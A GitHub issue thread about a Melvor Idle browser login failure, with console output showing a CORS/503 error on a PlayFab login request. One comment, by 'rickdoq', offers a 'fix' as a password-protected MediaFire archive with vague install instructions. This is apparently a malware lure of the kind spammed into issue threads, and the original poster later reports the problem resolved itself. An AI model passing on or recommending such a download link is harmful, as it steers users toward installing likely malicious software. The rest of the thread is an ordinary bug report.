### ISSUE TITLE
[Bug]: Can't log in on browser

### ISSUE THREAD

**Issue by kanadegao** [MelvorIdle/melvoridle.github.io#4613]
### Describe the bug

Can't log in game on browser

### Reproduction Steps

1.Go to [www.melvoridle.com](http://www.melvoridle.com/)
2.Type in username and password
3.Click Login button
4.Nothing happened

### Expected behaviour

Log in successful

### Console output

Initiating sign in cloudManager.js:329:31
Initiated login to Melvor Cloud cloudManager.js:329:31
Logging in to Melvor Cloud via POST cloudManager.js:329:31
Validating Melvor Cloud token cloudManager.js:329:31
Storing Melvor Cloud Token cloudManager.js:329:31
Initializing PlayFab login. Method: customID cloudManager.js:329:31
Logging in with Custom ID via PlayFab cloudManager.js:329:31
已拦截跨源请求：同源策略禁止读取位于 https://e3855.playfabapi.com/Client/LoginWithCustomID?sdk=JavaScriptSDK-1.93.210927 的远程资源。（原因：CORS 请求未能成功）。状态码：(null)。 2
Object { code: 503, status: "Service Unavailable", error: "Connection error", errorCode: 2, errorMessage: "", CallBackTimeMS: 3204, Request: {…}, CustomData: undefined }
cloudManager.js:329:31
Uncaught (in promise) 
Object { code: 503, status: "Service Unavailable", error: "Connection error", errorCode: 2, errorMessage: "", CallBackTimeMS: 3204, Request: {…}, CustomData: undefined }

sendRemoveListener on closed conduit firefox@tampermonkey.net.274877924699 ConduitsChild.sys.mjs:122:13
    _send resource://gre/modules/ConduitsChild.sys.mjs:122
    removeListener resource://gre/modules/ExtensionChild.sys.mjs:673
    removeListener resource://gre/modules/ExtensionChild.sys.mjs:929
    onClicked chrome://browser/content/child/ext-menus.js:291
    removeListener resource://gre/modules/ExtensionCommon.sys.mjs:2959
    revoke resource://gre/modules/ExtensionCommon.sys.mjs:2981
    close resource://gre/modules/ExtensionCommon.sys.mjs:2986
    unload resource://gre/modules/ExtensionCommon.sys.mjs:1019
    unload resource://gre/modules/ExtensionPageChild.sys.mjs:281
    unload resource://gre/modules/ExtensionPageChild.sys.mjs:324
    destroyExtensionContext resource://gre/modules/ExtensionPageChild.sys.mjs:496
    observe resource://gre/modules/ExtensionPageChild.sys.mjs:397

### Which platforms are you experiencing this bug on?

- [X] Chrome
- [X] Firefox
- [ ] Edge
- [ ] Safari
- [ ] Steam
- [ ] Epic Games
- [ ] Mobile App (iOS)
- [ ] Mobile App (Android)
- [ ] Mobile App (Android Beta)
- [ ] Other (Please Specify)

### Which expansions are purchased and active at the time of the bug?

- [X] Throne of the Herald
- [X] Atlas of Discovery
- [X] Into the Abyss

### Which version of the game are you experiencing this bug on?

v1.3

### Game Subversion

Unknown

### Are you using any mods?

No

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by kanadegao** [comment]
It fixed itself unexpectedly
